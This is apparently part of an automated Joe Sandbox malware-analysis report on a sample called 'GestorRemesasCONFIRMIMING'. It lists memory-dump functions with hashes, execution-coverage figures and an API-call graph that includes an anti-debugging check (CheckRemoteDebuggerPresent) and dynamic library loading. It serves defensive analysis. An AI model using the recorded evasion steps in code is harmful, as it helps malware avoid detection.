                                                  • Instruction ID: b3d903cdab75f488df60dab04cd405e9272955cae350be8ad4ea72b8501b376a
                                                  • Opcode Fuzzy Hash: cf78c8c7ca27e07286b6ae8adcd9e766d09c2f3a3aa14904fe947c36e04389eb
                                                  • Instruction Fuzzy Hash: CA210676A04244DFDB04DF14D9C0B26BFA5FB98324F24C5A9D9090B356C73AEC56CAA1
                                                  Function 00B6D4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30e79be623798acfbd65d889b81a21cdc8ea2cd7195554786de69a6c354beaf6
                                                  • Instruction ID: 3f12b218dedb19fdf7cb174e753e289c802db4a263ab27ed0df77293d36d3188
                                                  • Opcode Fuzzy Hash: 30e79be623798acfbd65d889b81a21cdc8ea2cd7195554786de69a6c354beaf6
                                                  • Instruction Fuzzy Hash: 22212872A04240DFDB15DF14D9C0F26BFA5FBD8318F24C5A9D90A0B656C33AD856CAA1
                                                  Function 00B7D1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122458191.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b7d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 545c4ac63f4b51af6620633b4993b4758467af0eac858220a0abc302754b63a2
                                                  • Instruction ID: eaacee7ad6cde684a540f5800519296ce80d51d13f8785d7127dce3a66a604a9
                                                  • Opcode Fuzzy Hash: 545c4ac63f4b51af6620633b4993b4758467af0eac858220a0abc302754b63a2
                                                  • Instruction Fuzzy Hash: 7E210EB1604200EFDB04DF10D9C0B26BBB1FF88314F20C6ADE90E4B292C37AD806CA61
                                                  Function 00B7D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122458191.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b7d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4cf74ea999e5f0361abe0db60623ec62cd16863b252476291acac90e7cff0227
                                                  • Instruction ID: bd56818ba6213b6566b3cfd51855aaa614b7d4647d2d1c2a610b16ddcf8c4678
                                                  • Opcode Fuzzy Hash: 4cf74ea999e5f0361abe0db60623ec62cd16863b252476291acac90e7cff0227
                                                  • Instruction Fuzzy Hash: BF210E75604200EFCB14DF24D9D0B26BBB1EF88314F20C5ADE90E4B292C37AD806CA61
                                                  Function 00B7D006 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122458191.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b7d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1a90f0aa876211451882cb93f59b012afbd37440f8ca2e4fc4ba5ec9cc72ff4
                                                  • Instruction ID: ec0af7e697388231466acd83636018a764ed14769977b399748799d0ae935123
                                                  • Opcode Fuzzy Hash: c1a90f0aa876211451882cb93f59b012afbd37440f8ca2e4fc4ba5ec9cc72ff4
                                                  • Instruction Fuzzy Hash: A12150755083849FCB02CF14D994B15BFB1EF46314F28C5DAD8498B2A7C33A9856CB62
                                                  Function 00B6D4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction ID: eb1f9f9777c18550ff398c47bfbf618db1f141b8a0f183524dd16763972d8219
                                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction Fuzzy Hash: B111E676904280CFCB15CF10D5C4B16BFB1FB94318F24C6EAD84A0B656C33AD856CBA1
                                                  Function 00B6D3D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction ID: f37fc1585ebb146215ee9125d68187148e92098797496caa6a09ec98409c58c7
                                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction Fuzzy Hash: 8211D3B6904284DFCB15CF10D5C4B16BFB1FB94324F24C6A9D9094B756C33AE856CBA1
                                                  Function 00B7D1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122458191.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b7d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction ID: 766a9340b27717aa3a341f8befa72b397ae54c8d8a0dff8ec490f12b5f7c48e1
                                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction Fuzzy Hash: 28118B75504284DFCB15CF10D5C4B15BBB1FF84314F28C6A9D8494B6A6C33AD84ACB61
                                                  Function 00B6D745 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 596b844565dc638fcd7b28d6ee054468b40bf712d171cd3f87af8b92dc9e5ba0
                                                  • Instruction ID: a14adbd689c391fd440d98814b333b08f5a630bcc382066d4591d7545fdd39b5
                                                  • Opcode Fuzzy Hash: 596b844565dc638fcd7b28d6ee054468b40bf712d171cd3f87af8b92dc9e5ba0
                                                  • Instruction Fuzzy Hash: 4C012672A043449AF7104F25DDC4B36BFD8DF41324F18C5AAEE091E286CABD9C40CAB2
                                                  Function 00B6D744 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5b8f82677cbe1324d709a9cc376bd88230130fe2d9c3c8aefd08cb6b3b19d0f
                                                  • Instruction ID: 8134124fe643fbfc51cf8e7758e37cf74c9c69481b6229e790d58966cdc513f2
                                                  • Opcode Fuzzy Hash: c5b8f82677cbe1324d709a9cc376bd88230130fe2d9c3c8aefd08cb6b3b19d0f
                                                  • Instruction Fuzzy Hash: 3FF062725053449AF7108F15DDC4B62FFD8EB91734F18C59AED085A286C2799C44CBB1

                                                  Non-executed Functions

                                                  Function 06A44D40 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: OO+
                                                  • API String ID: 0-3062026257
                                                  • Opcode ID: a7bf22242cdd1b3032e28d2c95cd5ab14800284ff3ffc023e44e49c3e655aefc
                                                  • Instruction ID: b50f42e9c74d8cb6aa3f92690fa81fdd781bff7a6fc54a271e1ae41a9e1f10d0
                                                  • Opcode Fuzzy Hash: a7bf22242cdd1b3032e28d2c95cd5ab14800284ff3ffc023e44e49c3e655aefc
                                                  • Instruction Fuzzy Hash: D8E1EC74E001598FDB54EF99C980AAEFBF2FF89304F248269D415AB355D730A942CFA0
                                                  Function 04B20040 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 050af1454614d9693b3dbe7d62bdb1c6a2d71364f36fc75d9feb45ec6aa3f1d9
                                                  • Instruction ID: eba882a80bd699d9a0e0991c1cb56954f99e7517b668432370f1082f0ee85064
                                                  • Opcode Fuzzy Hash: 050af1454614d9693b3dbe7d62bdb1c6a2d71364f36fc75d9feb45ec6aa3f1d9
                                                  • Instruction Fuzzy Hash: 14125FB0501B46CAE710EF65FE5D3CD7AB1BBC6328B90C209D2616A2F5DBB4154ACF84
                                                  Function 06A46E48 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5336587bdf92b0474be2b29e82110db679680c5366c908399b15fa9bb0fce6d2
                                                  • Instruction ID: 7faaf61b869fa3e890213b06a821c116018b43f9d3b1a11c9f88ab44e2d15b28
                                                  • Opcode Fuzzy Hash: 5336587bdf92b0474be2b29e82110db679680c5366c908399b15fa9bb0fce6d2
                                                  • Instruction Fuzzy Hash: 75E10D74E001598FDB14EF99C990AAEFBB2FF89304F248259D414AB355D771AD42CFA0
                                                  Function 06A46498 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe462f235b369b374e3b95360daa7e69976d254e0b4c8494c81f9499a0d7565a
                                                  • Instruction ID: 5814f8acf7d2700bcc4a2627b75efb1d12967e8436f28ffaeffbe29619cbd561
                                                  • Opcode Fuzzy Hash: fe462f235b369b374e3b95360daa7e69976d254e0b4c8494c81f9499a0d7565a
                                                  • Instruction Fuzzy Hash: B9E1FE74E002598FDB14EFA9C990AAEFBF2FF89304F249259D414AB355D7309942CFA1
                                                  Function 06A444D0 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3deb2dcdaf1b5c0038cc42bf13f0a86f9e00b135091a1c7d9745676d18cbc2c5
                                                  • Instruction ID: 2ebe17d9b11778e3e37445bf859f404129855da70dc6b7431679cabe131c3bc0
                                                  • Opcode Fuzzy Hash: 3deb2dcdaf1b5c0038cc42bf13f0a86f9e00b135091a1c7d9745676d18cbc2c5
                                                  • Instruction Fuzzy Hash: E0E1FC74E002598FDB54EF99C980AAEFBF2FF89304F248259D414AB355D730A942CFA1
                                                  Function 06A44908 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5c4f44d623a9c1634b11ad2f7b8f5a63f32c50f7b123ac8ec9ae2630867b0bf
                                                  • Instruction ID: 611769381617147d7ca2304f1360c4a4b4d291594e43b63d000fa39a2072395a
                                                  • Opcode Fuzzy Hash: f5c4f44d623a9c1634b11ad2f7b8f5a63f32c50f7b123ac8ec9ae2630867b0bf
                                                  • Instruction Fuzzy Hash: EAE10E74E001598FDB54EF99C980AAEFBF2FF89305F248269D414AB355D730A942CFA0
                                                  Function 00BFDC74 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e228914285365f9e8e5e680c1d4ad87b372d150942d30e2a886ef125c34ee4bf
                                                  • Instruction ID: 89ef447d4baa5eefbc8d1a6c25f5e73f890bb85d3cdbc69e822430ee8986300b
                                                  • Opcode Fuzzy Hash: e228914285365f9e8e5e680c1d4ad87b372d150942d30e2a886ef125c34ee4bf
                                                  • Instruction Fuzzy Hash: 5DA15136A002198FCF05DFB5C8405EEB7F2FF85300B1585BAEA05AB265DB75E959CB80
                                                  Function 04B20006 Relevance: .2, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97fc77289036c52c5caa9d55d3e37725f5255d4208ddc3677d889f6d158cbba6
                                                  • Instruction ID: cbe617197b6a33e5d25f22e02c71dfd45dfc80fed3967f6cb50af5a66823229b
                                                  • Opcode Fuzzy Hash: 97fc77289036c52c5caa9d55d3e37725f5255d4208ddc3677d889f6d158cbba6
                                                  • Instruction Fuzzy Hash: 3DD1C3B0901B46CAD711EF65FE583CD7BB1BBCA324B558209D2616B2F1DBB4144ACF84
                                                  Function 06A448F8 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fc9489ecccf222b1bb1d49f41fc0d194842b606a186c5d3dec4bf94e07ec160
                                                  • Instruction ID: 1bbb1115257d5e1a0685f6945c5162908dca8e689aca4ac442ce97bf09edc946
                                                  • Opcode Fuzzy Hash: 6fc9489ecccf222b1bb1d49f41fc0d194842b606a186c5d3dec4bf94e07ec160
                                                  • Instruction Fuzzy Hash: 7551FD74E042598FDB14DFAAC9406AEFBF2FF89304F248269D418AB355D7319942CFA1

                                                  Execution Graph

                                                  Execution Coverage:11.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:3.6%
                                                  Total number of Nodes:84
                                                  Total number of Limit Nodes:11
                                                  execution_graph 37543 2947ec0 37544 2947f04 CheckRemoteDebuggerPresent 37543->37544 37545 2947f46 37544->37545 37531 68f3f28 DuplicateHandle 37532 68f3fbe 37531->37532 37546 294f228 37547 294f245 37546->37547 37548 294f26d 37546->37548 37552 294f2d4 37548->37552 37557 294f310 37548->37557 37549 294f28a 37554 294f2e5 37552->37554 37553 294f2f3 37553->37549 37554->37553 37555 294f356 GlobalMemoryStatusEx 37554->37555 37556 294f386 37555->37556 37556->37549 37558 294f356 GlobalMemoryStatusEx 37557->37558 37559 294f386 37558->37559 37559->37549 37560 2940848 37562 294084e 37560->37562 37561 294091b 37562->37561 37565 68f2fc8 37562->37565 37569 68f2fd8 37562->37569 37566 68f2fd8 37565->37566 37573 68f2bc8 37566->37573 37570 68f2fe7 37569->37570 37571 68f2bc8 2 API calls 37570->37571 37572 68f3008 37571->37572 37572->37562 37574 68f2bd3 37573->37574 37577 68f3b84 37574->37577 37576 68f458e 37578 68f3b8f 37577->37578 37579 68f4cb4 37578->37579 37581 68f6940 37578->37581 37579->37576 37582 68f6961 37581->37582 37583 68f6985 37582->37583 37585 68f6af0 37582->37585 37583->37579 37586 68f6afd 37585->37586 37587 68f6b36 37586->37587 37589 68f55d4 37586->37589 37587->37583 37590 68f55df 37589->37590 37592 68f6ba8 37590->37592 37593 68f5608 37590->37593 37592->37592 37594 68f5613 37593->37594 37600 68f5618 37594->37600 37596 68f6c17 37604 68fc0a0 37596->37604 37609 68fc0b8 37596->37609 37597 68f6c51 37597->37592 37603 68f5623 37600->37603 37601 68f8018 37601->37596 37602 68f6940 2 API calls 37602->37601 37603->37601 37603->37602 37605 68fc0b8 37604->37605 37606 68fc0f5 37605->37606 37615 68fc320 37605->37615 37619 68fc330 37605->37619 37606->37597 37611 68fc135 37609->37611 37612 68fc0e9 37609->37612 37610 68fc0f5 37610->37597 37611->37597 37612->37610 37613 68fc320 2 API calls 37612->37613 37614 68fc330 2 API calls 37612->37614 37613->37611 37614->37611 37616 68fc330 37615->37616 37622 68fc370 37616->37622 37617 68fc33a 37617->37606 37621 68fc370 2 API calls 37619->37621 37620 68fc33a 37620->37606 37621->37620 37623 68fc375 37622->37623 37624 68fc3b4 37623->37624 37628 68fc60a LoadLibraryExW 37623->37628 37629 68fc618 LoadLibraryExW 37623->37629 37624->37617 37625 68fc5b8 GetModuleHandleW 37627 68fc5e5 37625->37627 37626 68fc3ac 37626->37624 37626->37625 37627->37617 37628->37626 37629->37626 37533 68f3ce0 37534 68f3d26 GetCurrentProcess 37533->37534 37536 68f3d78 GetCurrentThread 37534->37536 37537 68f3d71 37534->37537 37538 68f3dae 37536->37538 37539 68f3db5 GetCurrentProcess 37536->37539 37537->37536 37538->37539 37540 68f3deb 37539->37540 37541 68f3e13 GetCurrentThreadId 37540->37541 37542 68f3e44 37541->37542 37630 68fe550 37631 68fe5b8 CreateWindowExW 37630->37631 37633 68fe674 37631->37633

                                                  Executed Functions

                                                  Function 02947EC0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 758 2947ec0-2947f44 CheckRemoteDebuggerPresent 760 2947f46-2947f4c 758->760 761 2947f4d-2947f88 758->761 760->761
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02947F37
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 7e69bb071ba6547d4a7bbaa600cc853f96e10183ab8f528c5bc375aca5abba04
                                                  • Instruction ID: 1eeab209e32c2fe49a02173779012a552d421383c32a732ec117cf290792aa8e
                                                  • Opcode Fuzzy Hash: 7e69bb071ba6547d4a7bbaa600cc853f96e10183ab8f528c5bc375aca5abba04
                                                  • Instruction Fuzzy Hash: 8A2128B1801259CFDB10CF9AD484BEEFBF4AF49224F14846AE559A3250D778A944CF61
                                                  Function 0691234B Relevance: 1.0, Instructions: 996COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 068abbfac31d65b0ea6c352aee2551a592e9b1efdabc0ab3e9a86d0212c5ec83
                                                  • Instruction ID: 360c9f7a77301cc642d8486a05918441c08cb44ded518850e43ee7a165316044
                                                  • Opcode Fuzzy Hash: 068abbfac31d65b0ea6c352aee2551a592e9b1efdabc0ab3e9a86d0212c5ec83
                                                  • Instruction Fuzzy Hash: 65925930A00209CFDB64EB68C584A5DB7F6FB45314F6488AAD419EF7A1DB75ED81CB80
                                                  Function 06916170 Relevance: .8, Instructions: 821COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1619c6a30321948c3d6d4b4902a9d898bd5ca4f99a273028e33c7689b2f7d14
                                                  • Instruction ID: 2651f12396bac23ee3080a26f5df02c1690463c475a93ecec1969759dd9ce22e
                                                  • Opcode Fuzzy Hash: f1619c6a30321948c3d6d4b4902a9d898bd5ca4f99a273028e33c7689b2f7d14
                                                  • Instruction Fuzzy Hash: 86629B30F002098FDB54EB68D594AADB7F6EF88314F248569E406EB795DB35ED42CB80
                                                  Function 0691C100 Relevance: .6, Instructions: 638COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c010d1efc148878a61a2dd9b5ec466c36b6fc7fcec465e56aca8d3710c243bd8
                                                  • Instruction ID: 9188823c7a4a2ce204aaa853aea80b92ef6824a166888663f1406f99a44dc15d
                                                  • Opcode Fuzzy Hash: c010d1efc148878a61a2dd9b5ec466c36b6fc7fcec465e56aca8d3710c243bd8
                                                  • Instruction Fuzzy Hash: 0D328034B50209CFDB54DB68D880BAEB7B6FB88310F208529E505EB755DB39EC46CB91
                                                  Function 06915158 Relevance: .6, Instructions: 583COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af784a152be32696d9ece390dd3f03fb5010508b8117c29d4e351e57839d9978
                                                  • Instruction ID: 72c82540badd67781ffd7ec97d88a0987e143dbd8bb2b80ea36787954db040be
                                                  • Opcode Fuzzy Hash: af784a152be32696d9ece390dd3f03fb5010508b8117c29d4e351e57839d9978
                                                  • Instruction Fuzzy Hash: 5312E471F002598FDB60DBA4D88066EB7B6EB84310F36842AE956DF785DA74DC42CB80
                                                  Function 0691B438 Relevance: .6, Instructions: 562COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bb8361db0147de559e2cad870e1c9bb7e318ba7738218ddc180650dca5bd38e
                                                  • Instruction ID: 457f38b200e9fbd1bc46c41e10aa700b20c14b4c83a2ff5556601a2dd5352c0a
                                                  • Opcode Fuzzy Hash: 9bb8361db0147de559e2cad870e1c9bb7e318ba7738218ddc180650dca5bd38e
                                                  • Instruction Fuzzy Hash: FA222D30E0014D8BEF64DBA8D5907ADB7B6EB85310F748526E405DBB9ADA34DC82CB51
                                                  Function 06913020 Relevance: .5, Instructions: 545COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f015f07409dfdf077a81e0619c19c929570726b6a16cb67e50a521f216c88e46
                                                  • Instruction ID: 380d778741d466e0fee0a646ca85a016973b8fe04ae9222cd87721c7716e3b41
                                                  • Opcode Fuzzy Hash: f015f07409dfdf077a81e0619c19c929570726b6a16cb67e50a521f216c88e46
                                                  • Instruction Fuzzy Hash: 19323E30E1065ACFDB15EF74C85069DB7B6BFD9300F6086AAD409AB654EF70AD85CB80
                                                  Function 069178F0 Relevance: .5, Instructions: 475COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25657d5f1c456b52eadb233a8a4a928015d4ccffce1b0826499fc3a684b4bcc1
                                                  • Instruction ID: 6ee2d331550bc1a1d89883502e18d8c49e801fd6d28a2b4125eeb4c5615502e6
                                                  • Opcode Fuzzy Hash: 25657d5f1c456b52eadb233a8a4a928015d4ccffce1b0826499fc3a684b4bcc1
                                                  • Instruction Fuzzy Hash: 1C029E30B0021A8FDB54DBA8D490AAEB7E6FF84310F348529E4069F795DB35ED42CB90
                                                  Function 068F3CDA Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3D5E
                                                  • GetCurrentThread.KERNEL32 ref: 068F3D9B
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3DD8
                                                  • GetCurrentThreadId.KERNEL32 ref: 068F3E31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 94f57575df17fc234ad03acfadb404bd0d9797b3dcd7541db6f01436fae946f3
                                                  • Instruction ID: bebf18d20a72fee7aad6571a85ed9852eb9dccb5c24520c6802ec5bdf60aed7b
